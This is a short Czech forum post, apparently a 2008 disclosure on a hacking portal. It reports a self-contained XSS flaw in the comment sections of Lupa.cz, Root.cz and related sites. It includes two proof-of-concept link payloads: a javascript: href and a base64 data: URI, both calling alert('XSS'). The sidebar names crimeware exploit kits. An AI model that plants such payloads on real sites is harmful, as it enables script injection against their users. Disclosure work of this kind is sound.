Lupa.cz, Root.cz... Self-contained XSS

BugTrack

Lupa.cz, Root.cz... Self-contained XSS

Weby společnosti Internet Info, s.r.o. mezi něž patří Lupa.cz, Root.cz a mnoho dalších obsahují Self-contained XSS zranitelnost.

Zranitelnost se nachází v místech, kde je možné vkládat své komentáře včetně odkazů. Útočník pro vyvolání XSS může vložit odkaz v tomto formátu:

<a href="javascript:alert('XSS');">Odkaz<
;/a> nebo
<a href="data: text/html;base64,PHNjcmlwdD4KYWxlcnQoJ1hTUy
cpOwo8L3NjcmlwdD4=">
Odkaz</a>

Link na vložené zkušební odkazy na Lupě: [link]

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)

.cCuMiNn. |

30.1.2008 21:32

Zpět


	.Infobox Nejnovější: Články: Zabraňte zneužití svých dat Skrytí oprávnění v Androidu (CVE-2019-2089) Studie: Třetina českých e-shopů má bezpečnostní problémy! Aktuality: Pozvánka na OWASP meetup v Brně Co nyní dělají zakladatelé hacking portálů? Pozvánka na OWASP Czech chapter meeting IT Právo: Jak poslat Email, aby se nejednalo o spam? Konverzace na ICQ jako důkaz. Uveřejnění cizích fotografií Soubory: Phoenix 2.5 Crimeware Exploit Kit Crimepack 3.1.3 BugTrack: SQLi na listyprahy1.cz SQLi na Florenc SQLi na kacov.cz HackForum: Sciolink a pořizování screenshotu obrazovky Dark Web - zkušenosti Detekce HW keyloggeru Další služby: BBC: Supported Tags RSS: RSS Feeds v2.0 IRC: #soom (irc.2600.net) Na SOOM.cz je: Článků: 991 Komentářů: 14 254 Aktualit: 1 862 Souborů: 151 WebForum: 49 402 Hardware: 38 Diskuze: 20 325 BugTrack: 4 414 Reg. uživatelů: 16 252 A proběhlo: Zobraz. článků: 17 625 849 Staženo souborů: 1 380 186 Staženo dat: 889 668 MB Přístupy (hits): 213 064 588

Lupa.cz, Root.cz... Self-contained XSS

BugTrack

Hacking keywords